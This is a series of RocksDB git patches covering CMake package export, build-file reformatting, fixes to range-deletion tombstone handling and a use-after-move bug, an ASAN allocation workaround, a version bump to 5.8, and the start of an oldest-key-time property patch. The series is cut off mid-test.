Adds support for CMake packages: https://cmake.org/cmake/help/v3.9/manual/cmake-packages.7.html#creating-packages. This allows other CMake projects to use RocksDB this way:

```
cmake_minimum_required(VERSION 3.5)
project(rdbt)
find_package(RocksDB CONFIG)
add_executable(rdbt test.cpp)
target_link_libraries(rdbt PRIVATE RocksDB::rocksdb)
```
Closes https://github.com/facebook/rocksdb/pull/2773

Differential Revision: D5722587

Pulled By: sagar0

fbshipit-source-id: 0d90dc4a77b42a617cdbe1348a370e719c282b87
---
 CMakeLists.txt               | 51 +++++++++++++++++++++++++++++++++---
 cmake/RocksDBConfig.cmake.in |  3 +++
 2 files changed, 51 insertions(+), 3 deletions(-)
 create mode 100644 cmake/RocksDBConfig.cmake.in

diff --git a/CMakeLists.txt b/CMakeLists.txt
index 715147291fc..b04f7ae25f8 100644
--- a/CMakeLists.txt
+++ b/CMakeLists.txt
@@ -648,9 +648,54 @@ if(NOT WIN32 OR ROCKSDB_INSTALL_ON_WINDOWS)
   endif()
 
   include(GNUInstallDirs)
-  install(TARGETS ${ROCKSDB_STATIC_LIB} COMPONENT devel ARCHIVE DESTINATION ${CMAKE_INSTALL_LIBDIR})
-  install(TARGETS ${ROCKSDB_SHARED_LIB} COMPONENT runtime DESTINATION ${CMAKE_INSTALL_LIBDIR})
-  install(DIRECTORY include/rocksdb COMPONENT devel DESTINATION ${CMAKE_INSTALL_INCLUDEDIR})
+  include(CMakePackageConfigHelpers)
+
+  set(package_config_destination ${CMAKE_INSTALL_LIBDIR}/cmake/rocksdb)
+
+  configure_package_config_file(
+    ${CMAKE_SOURCE_DIR}/cmake/RocksDBConfig.cmake.in RocksDBConfig.cmake
+    INSTALL_DESTINATION ${package_config_destination}
+  )
+
+  write_basic_package_version_file(
+    RocksDBConfigVersion.cmake
+    VERSION ${ROCKSDB_VERSION}
+    COMPATIBILITY SameMajorVersion
+  )
+
+  install(DIRECTORY include/rocksdb COMPONENT devel DESTINATION "${CMAKE_INSTALL_INCLUDEDIR}")
+
+  install(
+    TARGETS ${ROCKSDB_STATIC_LIB}
+    EXPORT RocksDBTargets
+    COMPONENT devel
+    ARCHIVE DESTINATION "${CMAKE_INSTALL_LIBDIR}"
+    INCLUDES DESTINATION "${CMAKE_INSTALL_INCLUDEDIR}"
+  )
+
+  install(
+    TARGETS ${ROCKSDB_SHARED_LIB}
+    EXPORT RocksDBTargets
+    COMPONENT runtime
+    RUNTIME DESTINATION "${CMAKE_INSTALL_BINDIR}"
+    LIBRARY DESTINATION "${CMAKE_INSTALL_LIBDIR}"
+    INCLUDES DESTINATION "${CMAKE_INSTALL_INCLUDEDIR}"
+  )
+
+  install(
+    EXPORT RocksDBTargets
+    COMPONENT devel
+    DESTINATION ${package_config_destination}
+    NAMESPACE RocksDB::
+  )
+
+  install(
+    FILES
+      ${CMAKE_CURRENT_BINARY_DIR}/RocksDBConfig.cmake
+      ${CMAKE_CURRENT_BINARY_DIR}/RocksDBConfigVersion.cmake
+    COMPONENT devel
+    DESTINATION ${package_config_destination}
+  )
 endif()
 
 option(WITH_TESTS "build with tests" ON)
diff --git a/cmake/RocksDBConfig.cmake.in b/cmake/RocksDBConfig.cmake.in
new file mode 100644
index 00000000000..b3cb2b27adf
--- /dev/null
+++ b/cmake/RocksDBConfig.cmake.in
@@ -0,0 +1,3 @@
+@PACKAGE_INIT@
+include("${CMAKE_CURRENT_LIST_DIR}/RocksDBTargets.cmake")
+check_required_components(RocksDB)

From c41744270ac0e5ee649181211d8b09facfa45255 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Pawe=C5=82=20Bylica?=
Date: Mon, 28 Aug 2017 18:36:35 -0700
Subject: [PATCH 159/205] CMake: Fix formatting

Summary:
This is a followup of #2195.
Closes https://github.com/facebook/rocksdb/pull/2772

Differential Revision: D5722495

Pulled By: sagar0

fbshipit-source-id: 169d0cef53b03056ea7b9454954a35c707a67d52
---
 CMakeLists.txt | 148 ++++++++++++++++++++++++-------------------------
 1 file changed, 74 insertions(+), 74 deletions(-)

diff --git a/CMakeLists.txt b/CMakeLists.txt
index b04f7ae25f8..31ab5abb8f5 100644
--- a/CMakeLists.txt
+++ b/CMakeLists.txt
@@ -700,7 +700,7 @@ endif()
 
 option(WITH_TESTS "build with tests" ON)
 if(WITH_TESTS)
-set(TESTS
+  set(TESTS
     cache/cache_test.cc
     cache/lru_cache_test.cc
     db/column_family_test.cc
@@ -832,85 +832,85 @@ set(TESTS
     utilities/transactions/transaction_test.cc
     utilities/ttl/ttl_test.cc
     utilities/write_batch_with_index/write_batch_with_index_test.cc
-)
-if(WITH_LIBRADOS)
-  list(APPEND TESTS utilities/env_librados_test.cc)
-endif()
-
-set(BENCHMARKS
-  cache/cache_bench.cc
-  memtable/memtablerep_bench.cc
-  tools/db_bench.cc
-  table/table_reader_bench.cc
-  utilities/column_aware_encoding_exp.cc
-  utilities/persistent_cache/hash_table_bench.cc)
-add_library(testharness OBJECT util/testharness.cc)
-foreach(sourcefile ${BENCHMARKS})
-  get_filename_component(exename ${sourcefile} NAME_WE)
-  add_executable(${exename}${ARTIFACT_SUFFIX} ${sourcefile}
-    $<TARGET_OBJECTS:testharness>)
-  target_link_libraries(${exename}${ARTIFACT_SUFFIX} gtest ${LIBS})
-endforeach(sourcefile ${BENCHMARKS})
-
-# For test util library that is build only in DEBUG mode
-# and linked to tests. Add test only code that is not #ifdefed for Release here.
-set(TESTUTIL_SOURCE
-  db/db_test_util.cc
-  monitoring/thread_status_updater_debug.cc
-  table/mock_table.cc
-  util/fault_injection_test_env.cc
-  utilities/cassandra/test_utils.cc
-)
-# test utilities are only build in debug
-enable_testing()
-add_custom_target(check COMMAND ${CMAKE_CTEST_COMMAND})
-set(TESTUTILLIB testutillib${ARTIFACT_SUFFIX})
-add_library(${TESTUTILLIB} STATIC ${TESTUTIL_SOURCE})
-if(MSVC)
-  set_target_properties(${TESTUTILLIB} PROPERTIES COMPILE_FLAGS "/Fd${CMAKE_CFG_INTDIR}/testutillib${ARTIFACT_SUFFIX}.pdb")
-endif()
-set_target_properties(${TESTUTILLIB}
-    PROPERTIES EXCLUDE_FROM_DEFAULT_BUILD_RELEASE 1
-      EXCLUDE_FROM_DEFAULT_BUILD_MINRELEASE 1
-      EXCLUDE_FROM_DEFAULT_BUILD_RELWITHDEBINFO 1
-    )
-
-# Tests are excluded from Release builds
-set(TEST_EXES ${TESTS})
+  )
+  if(WITH_LIBRADOS)
+    list(APPEND TESTS utilities/env_librados_test.cc)
+  endif()
 
-foreach(sourcefile ${TEST_EXES})
+  set(BENCHMARKS
+    cache/cache_bench.cc
+    memtable/memtablerep_bench.cc
+    tools/db_bench.cc
+    table/table_reader_bench.cc
+    utilities/column_aware_encoding_exp.cc
+    utilities/persistent_cache/hash_table_bench.cc)
+  add_library(testharness OBJECT util/testharness.cc)
+  foreach(sourcefile ${BENCHMARKS})
     get_filename_component(exename ${sourcefile} NAME_WE)
     add_executable(${exename}${ARTIFACT_SUFFIX} ${sourcefile}
       $<TARGET_OBJECTS:testharness>)
-    set_target_properties(${exename}${ARTIFACT_SUFFIX}
-      PROPERTIES EXCLUDE_FROM_DEFAULT_BUILD_RELEASE 1
-        EXCLUDE_FROM_DEFAULT_BUILD_MINRELEASE 1
-        EXCLUDE_FROM_DEFAULT_BUILD_RELWITHDEBINFO 1
-      )
-    target_link_libraries(${exename}${ARTIFACT_SUFFIX} testutillib${ARTIFACT_SUFFIX} gtest ${LIBS})
-    if(NOT "${exename}" MATCHES "db_sanity_test")
+    target_link_libraries(${exename}${ARTIFACT_SUFFIX} gtest ${LIBS})
+  endforeach(sourcefile ${BENCHMARKS})
+
+  # For test util library that is built only in DEBUG mode
+  # and linked to tests. Add test only code that is not #ifdefed for Release here.
+  set(TESTUTIL_SOURCE
+    db/db_test_util.cc
+    monitoring/thread_status_updater_debug.cc
+    table/mock_table.cc
+    util/fault_injection_test_env.cc
+    utilities/cassandra/test_utils.cc
+  )
+  # test utilities are only built in debug
+  enable_testing()
+  add_custom_target(check COMMAND ${CMAKE_CTEST_COMMAND})
+  set(TESTUTILLIB testutillib${ARTIFACT_SUFFIX})
+  add_library(${TESTUTILLIB} STATIC ${TESTUTIL_SOURCE})
+  if(MSVC)
+    set_target_properties(${TESTUTILLIB} PROPERTIES COMPILE_FLAGS "/Fd${CMAKE_CFG_INTDIR}/testutillib${ARTIFACT_SUFFIX}.pdb")
+  endif()
+  set_target_properties(${TESTUTILLIB}
+      PROPERTIES EXCLUDE_FROM_DEFAULT_BUILD_RELEASE 1
+        EXCLUDE_FROM_DEFAULT_BUILD_MINRELEASE 1
+        EXCLUDE_FROM_DEFAULT_BUILD_RELWITHDEBINFO 1
+      )
+
+  # Tests are excluded from Release builds
+  set(TEST_EXES ${TESTS})
+
+  foreach(sourcefile ${TEST_EXES})
+    get_filename_component(exename ${sourcefile} NAME_WE)
+    add_executable(${exename}${ARTIFACT_SUFFIX} ${sourcefile}
+      $<TARGET_OBJECTS:testharness>)
+    set_target_properties(${exename}${ARTIFACT_SUFFIX}
+      PROPERTIES EXCLUDE_FROM_DEFAULT_BUILD_RELEASE 1
+        EXCLUDE_FROM_DEFAULT_BUILD_MINRELEASE 1
+        EXCLUDE_FROM_DEFAULT_BUILD_RELWITHDEBINFO 1
+      )
+    target_link_libraries(${exename}${ARTIFACT_SUFFIX} testutillib${ARTIFACT_SUFFIX} gtest ${LIBS})
+    if(NOT "${exename}" MATCHES "db_sanity_test")
+      add_test(NAME ${exename} COMMAND ${exename}${ARTIFACT_SUFFIX})
+      add_dependencies(check ${exename}${ARTIFACT_SUFFIX})
+    endif()
+  endforeach(sourcefile ${TEST_EXES})
+
+  # C executables must link to a shared object
+  set(C_TESTS db/c_test.c)
+  set(C_TEST_EXES ${C_TESTS})
+
+  foreach(sourcefile ${C_TEST_EXES})
+    string(REPLACE ".c" "" exename ${sourcefile})
+    string(REGEX REPLACE "^((.+)/)+" "" exename ${exename})
+    add_executable(${exename}${ARTIFACT_SUFFIX} ${sourcefile})
+    set_target_properties(${exename}${ARTIFACT_SUFFIX}
+      PROPERTIES EXCLUDE_FROM_DEFAULT_BUILD_RELEASE 1
+        EXCLUDE_FROM_DEFAULT_BUILD_MINRELEASE 1
+        EXCLUDE_FROM_DEFAULT_BUILD_RELWITHDEBINFO 1
+      )
+    target_link_libraries(${exename}${ARTIFACT_SUFFIX} ${ROCKSDB_IMPORT_LIB} testutillib${ARTIFACT_SUFFIX})
     add_test(NAME ${exename} COMMAND ${exename}${ARTIFACT_SUFFIX})
     add_dependencies(check ${exename}${ARTIFACT_SUFFIX})
-  endif()
-endforeach(sourcefile ${TEST_EXES})
-
-# C executables must link to a shared object
-set(C_TESTS db/c_test.c)
-set(C_TEST_EXES ${C_TESTS})
-
-foreach(sourcefile ${C_TEST_EXES})
-  string(REPLACE ".c" "" exename ${sourcefile})
-  string(REGEX REPLACE "^((.+)/)+" "" exename ${exename})
-  add_executable(${exename}${ARTIFACT_SUFFIX} ${sourcefile})
-  set_target_properties(${exename}${ARTIFACT_SUFFIX}
-    PROPERTIES EXCLUDE_FROM_DEFAULT_BUILD_RELEASE 1
-      EXCLUDE_FROM_DEFAULT_BUILD_MINRELEASE 1
-      EXCLUDE_FROM_DEFAULT_BUILD_RELWITHDEBINFO 1
-    )
-  target_link_libraries(${exename}${ARTIFACT_SUFFIX} ${ROCKSDB_IMPORT_LIB} testutillib${ARTIFACT_SUFFIX})
-  add_test(NAME ${exename} COMMAND ${exename}${ARTIFACT_SUFFIX})
-  add_dependencies(check ${exename}${ARTIFACT_SUFFIX})
-endforeach(sourcefile ${C_TEST_EXES})
+  endforeach(sourcefile ${C_TEST_EXES})
 endif()
 
 option(WITH_TOOLS "build with tools" ON)

From b767972313677971bd96b20a72488ec9f2142747 Mon Sep 17 00:00:00 2001
From: Andrew Kryczka
Date: Tue, 29 Aug 2017 11:57:59 -0700
Subject: [PATCH 160/205] avoid use-after-move error

Summary:
* db/range_del_aggregator.cc (AddTombstone): Avoid a potential use-after-move bug. The original code would both use and move `tombstone` in a context where the order of those operations is not specified.
The fix is to perform the use on a new, preceding statement.

Author: meyering
Closes https://github.com/facebook/rocksdb/pull/2796

Differential Revision: D5721163

Pulled By: ajkr

fbshipit-source-id: a1d328d6a77a17c6425e8069860a202e615e2f48
---
 db/range_del_aggregator.cc | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/db/range_del_aggregator.cc b/db/range_del_aggregator.cc
index 0aa5d22cbcb..cb51ea7f876 100644
--- a/db/range_del_aggregator.cc
+++ b/db/range_del_aggregator.cc
@@ -357,7 +357,8 @@ Status RangeDelAggregator::AddTombstone(RangeTombstone tombstone) {
       ++new_range_dels_iter;
     }
   } else {
-    tombstone_map.emplace(tombstone.start_key_, std::move(tombstone));
+    auto start_key = tombstone.start_key_;
+    tombstone_map.emplace(start_key, std::move(tombstone));
   }
   return Status::OK();
 }

From 0980dc6c9abe263531cb313af56c5018b8f4b331 Mon Sep 17 00:00:00 2001
From: Huachao Huang
Date: Tue, 29 Aug 2017 18:27:21 -0700
Subject: [PATCH 161/205] Fix wrong smallest key of delete range tombstones

Summary:
Since tombstones are not stored in order, we may get a wrong smallest key if we only consider the first added tombstone.
Check https://github.com/facebook/rocksdb/issues/2752 for more details.
Closes https://github.com/facebook/rocksdb/pull/2799

Differential Revision: D5728217

Pulled By: ajkr

fbshipit-source-id: 4a53edb0ca80d2a9fcf10749e52d47d57d6417d3
---
 db/db_range_del_test.cc    | 34 ++++++++++++++++++++++++++++++++++
 db/range_del_aggregator.cc |  4 ++--
 2 files changed, 36 insertions(+), 2 deletions(-)

diff --git a/db/db_range_del_test.cc b/db/db_range_del_test.cc
index dbc27e870c1..982cbb85ab2 100644
--- a/db/db_range_del_test.cc
+++ b/db/db_range_del_test.cc
@@ -962,6 +962,40 @@ TEST_F(DBRangeDelTest, CompactionTreatsSplitInputLevelDeletionAtomically) {
   }
 }
 
+TEST_F(DBRangeDelTest, UnorderedTombstones) {
+  // Regression test for #2752. Range delete tombstones between
+  // different snapshot stripes are not stored in order, so the first
+  // tombstone of each snapshot stripe should be checked as a smallest
+  // candidate.
+  Options options = CurrentOptions();
+  DestroyAndReopen(options);
+
+  auto cf = db_->DefaultColumnFamily();
+
+  ASSERT_OK(db_->Put(WriteOptions(), cf, "a", "a"));
+  ASSERT_OK(db_->Flush(FlushOptions(), cf));
+  ASSERT_EQ(1, NumTableFilesAtLevel(0));
+  ASSERT_OK(dbfull()->TEST_CompactRange(0, nullptr, nullptr));
+  ASSERT_EQ(1, NumTableFilesAtLevel(1));
+
+  ASSERT_OK(db_->DeleteRange(WriteOptions(), cf, "b", "c"));
+  // Hold a snapshot to separate these two delete ranges.
+  auto snapshot = db_->GetSnapshot();
+  ASSERT_OK(db_->DeleteRange(WriteOptions(), cf, "a", "b"));
+  ASSERT_OK(db_->Flush(FlushOptions(), cf));
+  db_->ReleaseSnapshot(snapshot);
+
+  std::vector<std::vector<FileMetaData>> files;
+  dbfull()->TEST_GetFilesMetaData(cf, &files);
+  ASSERT_EQ(1, files[0].size());
+  ASSERT_EQ("a", files[0][0].smallest.user_key());
+  ASSERT_EQ("c", files[0][0].largest.user_key());
+
+  std::string v;
+  auto s = db_->Get(ReadOptions(), "a", &v);
+  ASSERT_TRUE(s.IsNotFound());
+}
+
 #endif  // ROCKSDB_LITE
 }  // namespace rocksdb
 
diff --git a/db/range_del_aggregator.cc b/db/range_del_aggregator.cc
index cb51ea7f876..c83f5a88cd8 100644
--- a/db/range_del_aggregator.cc
+++ b/db/range_del_aggregator.cc
@@ -413,8 +413,8 @@ void RangeDelAggregator::AddToBuilder(
 
   // Note the order in which tombstones are stored is insignificant since we
   // insert them into a std::map on the read path.
-  bool first_added = false;
   while (stripe_map_iter != rep_->stripe_map_.end()) {
+    bool first_added = false;
     for (auto tombstone_map_iter = stripe_map_iter->second.raw_map.begin();
          tombstone_map_iter != stripe_map_iter->second.raw_map.end();
          ++tombstone_map_iter) {
@@ -453,7 +453,7 @@ void RangeDelAggregator::AddToBuilder(
       builder->Add(ikey_and_end_key.first.Encode(), ikey_and_end_key.second);
       if (!first_added) {
         first_added = true;
-        InternalKey smallest_candidate = std::move(ikey_and_end_key.first);;
+        InternalKey smallest_candidate = std::move(ikey_and_end_key.first);
         if (lower_bound != nullptr &&
             icmp_.user_comparator()->Compare(smallest_candidate.user_key(),
                                              *lower_bound) <= 0) {

From e83d6a02e31c8930d1fd267b2bb0476601f6232c Mon Sep 17 00:00:00 2001
From: Yi Wu
Date: Tue, 29 Aug 2017 21:41:46 -0700
Subject: [PATCH 162/205] Not using aligned_alloc with gcc4 + asan

Summary:
GCC < 5 + ASAN does not instrument aligned_alloc, which can make ASAN report a false positive with a "free on address which was not malloc" error.
https://gcc.gnu.org/bugzilla/show_bug.cgi?id=61693

Also suppress the leak warning with LRUCache::DisownData().
Closes https://github.com/facebook/rocksdb/pull/2783

Differential Revision: D5696465

Pulled By: yiwu-arbug

fbshipit-source-id: 87c607c002511fa089b18cc35e24909bee0e74b4
---
 cache/lru_cache.cc | 23 ++++++-----------------
 port/port_posix.cc |  4 +++-
 2 files changed, 9 insertions(+), 18 deletions(-)

diff --git a/cache/lru_cache.cc b/cache/lru_cache.cc
index 47e40233648..268378b9d2b 100644
--- a/cache/lru_cache.cc
+++ b/cache/lru_cache.cc
@@ -234,35 +234,19 @@ void LRUCacheShard::EvictFromLRU(size_t charge,
 }
 
 void* LRUCacheShard::operator new(size_t size) {
-#if __SANITIZE_ADDRESS__
-  return malloc(size);
-#else
   return port::cacheline_aligned_alloc(size);
-#endif
 }
 
 void* LRUCacheShard::operator new[](size_t size) {
-#if __SANITIZE_ADDRESS__
-  return malloc(size);
-#else
   return port::cacheline_aligned_alloc(size);
-#endif
 }
 
 void LRUCacheShard::operator delete(void *memblock) {
-#if __SANITIZE_ADDRESS__
-  free(memblock);
-#else
   port::cacheline_aligned_free(memblock);
-#endif
 }
 
 void LRUCacheShard::operator delete[](void* memblock) {
-#if __SANITIZE_ADDRESS__
-  free(memblock);
-#else
   port::cacheline_aligned_free(memblock);
-#endif
 }
 
 void LRUCacheShard::SetCapacity(size_t capacity) {
@@ -518,7 +502,12 @@ uint32_t LRUCache::GetHash(Handle* handle) const {
   return reinterpret_cast<const LRUHandle*>(handle)->hash;
 }
 
-void LRUCache::DisownData() { shards_ = nullptr; }
+void LRUCache::DisownData() {
+// Do not drop data if compiled with ASAN, to suppress the leak warning.
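+// DisownData() deliberately leaks the shards so that shutdown does not pay
+// the cost of freeing the cache; under ASAN that intentional leak would be
+// reported, so keep the data owned instead.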
+#ifndef __SANITIZE_ADDRESS__
+  shards_ = nullptr;
+#endif  // !__SANITIZE_ADDRESS__
+}
 
 size_t LRUCache::TEST_GetLRUSize() {
   size_t lru_size_of_all_shards = 0;
diff --git a/port/port_posix.cc b/port/port_posix.cc
index ee073a55d3f..129933bb1f9 100644
--- a/port/port_posix.cc
+++ b/port/port_posix.cc
@@ -185,7 +185,9 @@ int GetMaxOpenFiles() {
 }
 
 void *cacheline_aligned_alloc(size_t size) {
-#if defined (_ISOC11_SOURCE)
+#if __GNUC__ < 5 && defined(__SANITIZE_ADDRESS__)
+  return malloc(size);
+#elif defined(_ISOC11_SOURCE)
   return aligned_alloc(CACHE_LINE_SIZE, size);
 #elif ( _POSIX_C_SOURCE >= 200112L || _XOPEN_SOURCE >= 600 || defined(__APPLE__))
   void *m;

From 64185c23ad9833850e97df15688b4410f56b68d3 Mon Sep 17 00:00:00 2001
From: Andrew Kryczka
Date: Tue, 29 Aug 2017 22:13:09 -0700
Subject: [PATCH 163/205] update HISTORY.md for DeleteRange bug fix

Summary:
fixed in #2799
Closes https://github.com/facebook/rocksdb/pull/2805

Differential Revision: D5734324

Pulled By: ajkr

fbshipit-source-id: a285d4e84bf1018dc2257fd6c3e7c075a7243263
---
 HISTORY.md | 1 +
 1 file changed, 1 insertion(+)

diff --git a/HISTORY.md b/HISTORY.md
index 581e6b3ad58..c898fb6b54d 100644
--- a/HISTORY.md
+++ b/HISTORY.md
@@ -16,6 +16,7 @@
 * Fix wrong latencies in `rocksdb.db.get.micros`, `rocksdb.db.write.micros`, and `rocksdb.sst.read.micros`.
 * Fix incorrect dropping of deletions during intra-L0 compaction.
 * Fix transient reappearance of keys covered by range deletions when memtable prefix bloom filter is enabled.
+* Fix potentially wrong file smallest key when range deletions separated by snapshot are written together.
 
 ## 5.7.0 (07/13/2017)
 ### Public API Change

From 266ac245affd69555643b735d19d3715c4eff91a Mon Sep 17 00:00:00 2001
From: Maysam Yabandeh
Date: Wed, 30 Aug 2017 14:12:03 -0700
Subject: [PATCH 164/205] Bumping version to 5.8

Summary:
Closes https://github.com/facebook/rocksdb/pull/2738

Differential Revision: D5736261

Pulled By: maysamyabandeh

fbshipit-source-id: 49d27e9ccd786c4056a3d586a060fe460ea883ac
---
 HISTORY.md                | 6 ++++++
 include/rocksdb/version.h | 2 +-
 2 files changed, 7 insertions(+), 1 deletion(-)

diff --git a/HISTORY.md b/HISTORY.md
index c898fb6b54d..4da23b8af82 100644
--- a/HISTORY.md
+++ b/HISTORY.md
@@ -1,8 +1,14 @@
 # Rocksdb Change Log
 ## Unreleased
 ### Public API Change
+### New Features
+### Bug Fixes
+
+## 5.8.0 (08/30/2017)
+### Public API Change
 * Users of `Statistics::getHistogramString()` will see fewer histogram buckets and different bucket endpoints.
 * `Slice::compare` and BytewiseComparator `Compare` no longer accept `Slice`s containing nullptr.
+* `Transaction::Get` and `Transaction::GetForUpdate` variants with `PinnableSlice` added.
 
 ### New Features
 * Add Iterator::Refresh(), which allows users to update the iterator state so that they can avoid some initialization costs of recreating iterators.
diff --git a/include/rocksdb/version.h b/include/rocksdb/version.h
index fb920cf2e7e..dd11ea7e8e5 100644
--- a/include/rocksdb/version.h
+++ b/include/rocksdb/version.h
@@ -5,7 +5,7 @@
 #pragma once
 
 #define ROCKSDB_MAJOR 5
-#define ROCKSDB_MINOR 7
+#define ROCKSDB_MINOR 8
 #define ROCKSDB_PATCH 0
 
 // Do not use these. We made the mistake of declaring macros starting with

From 88595c882a1e8b9d7878c0979733a47a372d8059 Mon Sep 17 00:00:00 2001
From: Yi Wu
Date: Mon, 23 Oct 2017 15:22:05 -0700
Subject: [PATCH 165/205] Add DB::Properties::kEstimateOldestKeyTime

Summary:
With FIFO compaction we would like to get the oldest data time for monitoring.
The problem is we don't have a timestamp for each key in the DB. As an approximation, we expose the earliest SST file "creation_time" property. My plan is to override the property with a more accurate value in blob db, where we actually have timestamps.
Closes https://github.com/facebook/rocksdb/pull/2842

Differential Revision: D5770600

Pulled By: yiwu-arbug

fbshipit-source-id: 03833c8f10bbfbee62f8ea5c0d03c0cafb5d853a
---
 HISTORY.md                         |  3 +-
 db/builder.cc                      | 17 ++++---
 db/builder.h                       |  7 ++-
 db/compaction_picker.cc            | 27 ++++++-----
 db/db_properties_test.cc           | 74 ++++++++++++++++++++++++++++++
 db/db_sst_test.cc                  | 14 ++++--
 db/db_test_util.h                  | 31 +++++++++++++
 db/flush_job.cc                    |  6 ++-
 db/internal_stats.cc               | 33 ++++++++++++-
 db/internal_stats.h                |  2 +
 db/memtable.cc                     | 22 ++++++++-
 db/memtable.h                      |  9 ++++
 db/memtable_list.cc                |  8 ++++
 db/memtable_list.h                 |  3 ++
 include/rocksdb/db.h               |  7 +++
 include/rocksdb/table_properties.h |  6 ++-
 table/block_based_table_builder.cc | 20 +++++---
 table/block_based_table_builder.h  |  3 +-
 table/block_based_table_factory.cc |  3 +-
 table/meta_blocks.cc               |  3 ++
 table/table_builder.h              |  8 +++-
 table/table_properties.cc          |  5 ++
 utilities/blob_db/blob_db_test.cc  | 45 +++++++-----------
 23 files changed, 282 insertions(+), 74 deletions(-)

diff --git a/HISTORY.md b/HISTORY.md
index 4da23b8af82..23bcdaee22a 100644
--- a/HISTORY.md
+++ b/HISTORY.md
@@ -1,8 +1,7 @@
 # Rocksdb Change Log
 ## Unreleased
-### Public API Change
 ### New Features
-### Bug Fixes
+* Add a new db property "rocksdb.estimate-oldest-key-time" to return oldest data timestamp. The property is available only for FIFO compaction with compaction_options_fifo.allow_compaction = false.
 
 ## 5.8.0 (08/30/2017)
 ### Public API Change
diff --git a/db/builder.cc b/db/builder.cc
index 6f973fdbd5b..7cfa7800cce 100644
--- a/db/builder.cc
+++ b/db/builder.cc
@@ -47,15 +47,15 @@ TableBuilder* NewTableBuilder(
     WritableFileWriter* file, const CompressionType compression_type,
     const CompressionOptions& compression_opts, int level,
     const std::string* compression_dict, const bool skip_filters,
-    const uint64_t creation_time) {
+    const uint64_t creation_time, const uint64_t oldest_key_time) {
   assert((column_family_id ==
           TablePropertiesCollectorFactory::Context::kUnknownColumnFamily) ==
          column_family_name.empty());
   return ioptions.table_factory->NewTableBuilder(
-      TableBuilderOptions(ioptions, internal_comparator,
-                          int_tbl_prop_collector_factories, compression_type,
-                          compression_opts, compression_dict, skip_filters,
-                          column_family_name, level, creation_time),
+      TableBuilderOptions(
+          ioptions, internal_comparator, int_tbl_prop_collector_factories,
+          compression_type, compression_opts, compression_dict, skip_filters,
+          column_family_name, level, creation_time, oldest_key_time),
       column_family_id, file);
 }
 
@@ -74,8 +74,8 @@ Status BuildTable(
     const CompressionOptions& compression_opts, bool paranoid_file_checks,
     InternalStats* internal_stats, TableFileCreationReason reason,
     EventLogger* event_logger, int job_id, const Env::IOPriority io_priority,
-    TableProperties* table_properties, int level,
-    const uint64_t creation_time) {
+    TableProperties* table_properties, int level, const uint64_t creation_time,
+    const uint64_t oldest_key_time) {
   assert((column_family_id ==
           TablePropertiesCollectorFactory::Context::kUnknownColumnFamily) ==
          column_family_name.empty());
@@ -120,12 +120,11 @@ Status BuildTable(
     file_writer.reset(new WritableFileWriter(std::move(file), env_options,
                                              ioptions.statistics));
-
     builder = NewTableBuilder(
        ioptions, internal_comparator, int_tbl_prop_collector_factories,
        column_family_id, column_family_name, file_writer.get(), compression,
        compression_opts, level, nullptr /* compression_dict */,
-        false /* skip_filters */, creation_time);
+        false /* skip_filters */, creation_time, oldest_key_time);
   }
 
   MergeHelper merge(env, internal_comparator.user_comparator(),
diff --git a/db/builder.h b/db/builder.h
index a432a753182..f637368822b 100644
--- a/db/builder.h
+++ b/db/builder.h
@@ -6,6 +6,7 @@
 // Use of this source code is governed by a BSD-style license that can be
 // found in the LICENSE file. See the AUTHORS file for names of contributors.
 #pragma once
+#include <limits>
 #include
 #include
 #include
@@ -50,7 +51,8 @@ TableBuilder* NewTableBuilder(
     WritableFileWriter* file, const CompressionType compression_type,
     const CompressionOptions& compression_opts, int level,
     const std::string* compression_dict = nullptr,
-    const bool skip_filters = false, const uint64_t creation_time = 0);
+    const bool skip_filters = false, const uint64_t creation_time = 0,
+    const uint64_t oldest_key_time = std::numeric_limits<uint64_t>::max());
 
 // Build a Table file from the contents of *iter. The generated file
 // will be named according to number specified in meta. On success, the rest of
@@ -77,6 +79,7 @@ extern Status BuildTable(
     EventLogger* event_logger = nullptr, int job_id = 0,
     const Env::IOPriority io_priority = Env::IO_HIGH,
     TableProperties* table_properties = nullptr, int level = -1,
-    const uint64_t creation_time = 0);
+    const uint64_t creation_time = 0,
+    const uint64_t oldest_key_time = std::numeric_limits<uint64_t>::max());
 
 }  // namespace rocksdb
diff --git a/db/compaction_picker.cc b/db/compaction_picker.cc
index c6a56746ff0..79af3ed9fe0 100644
--- a/db/compaction_picker.cc
+++ b/db/compaction_picker.cc
@@ -1442,19 +1442,22 @@ Compaction* FIFOCompactionPicker::PickTTLCompaction(
   inputs.emplace_back();
   inputs[0].level = 0;
 
-  for (auto ritr = level_files.rbegin(); ritr != level_files.rend(); ++ritr) {
-    auto f = *ritr;
-    if (f->fd.table_reader != nullptr &&
-        f->fd.table_reader->GetTableProperties() != nullptr) {
-      auto creation_time =
-          f->fd.table_reader->GetTableProperties()->creation_time;
-      if (creation_time == 0 ||
-          creation_time >=
-              (current_time - ioptions_.compaction_options_fifo.ttl)) {
-        break;
+  // avoid underflow
+  if (current_time > ioptions_.compaction_options_fifo.ttl) {
+    for (auto ritr = level_files.rbegin(); ritr != level_files.rend(); ++ritr) {
+      auto f = *ritr;
+      if (f->fd.table_reader != nullptr &&
+          f->fd.table_reader->GetTableProperties() != nullptr) {
+        auto creation_time =
+            f->fd.table_reader->GetTableProperties()->creation_time;
+        if (creation_time == 0 ||
+            creation_time >=
+                (current_time - ioptions_.compaction_options_fifo.ttl)) {
+          break;
+        }
+        total_size -= f->compensated_file_size;
+        inputs[0].files.push_back(f);
       }
-      total_size -= f->compensated_file_size;
-      inputs[0].files.push_back(f);
     }
   }
diff --git a/db/db_properties_test.cc b/db/db_properties_test.cc
index b09fe1ffacc..0da64b13656 100644
--- a/db/db_properties_test.cc
+++ b/db/db_properties_test.cc
@@ -1309,6 +1309,80 @@ TEST_F(DBPropertiesTest, EstimateNumKeysUnderflow) {
   ASSERT_EQ(0, num_keys);
 }
 
+TEST_F(DBPropertiesTest, EstimateOldestKeyTime) {
+  std::unique_ptr<MockTimeEnv> mock_env(new MockTimeEnv(Env::Default()));
+  uint64_t oldest_key_time = 0;
+  Options options;
+  options.env = mock_env.get();
+
+  // "rocksdb.estimate-oldest-key-time" is only available for FIFO compaction.
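+  // For the other compaction styles, the GetIntProperty call below is
+  // expected to report the property as unavailable (return false).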
+  mock_env->set_current_time(100);
+  for (auto compaction : {kCompactionStyleLevel, kCompactionStyleUniversal,
+                          kCompactionStyleNone}) {
+    options.compaction_style = compaction;
+    options.create_if_missing = true;
+    DestroyAndReopen(options);
+    ASSERT_OK(Put("foo", "bar"));
+    ASSERT_FALSE(dbfull()->GetIntProperty(
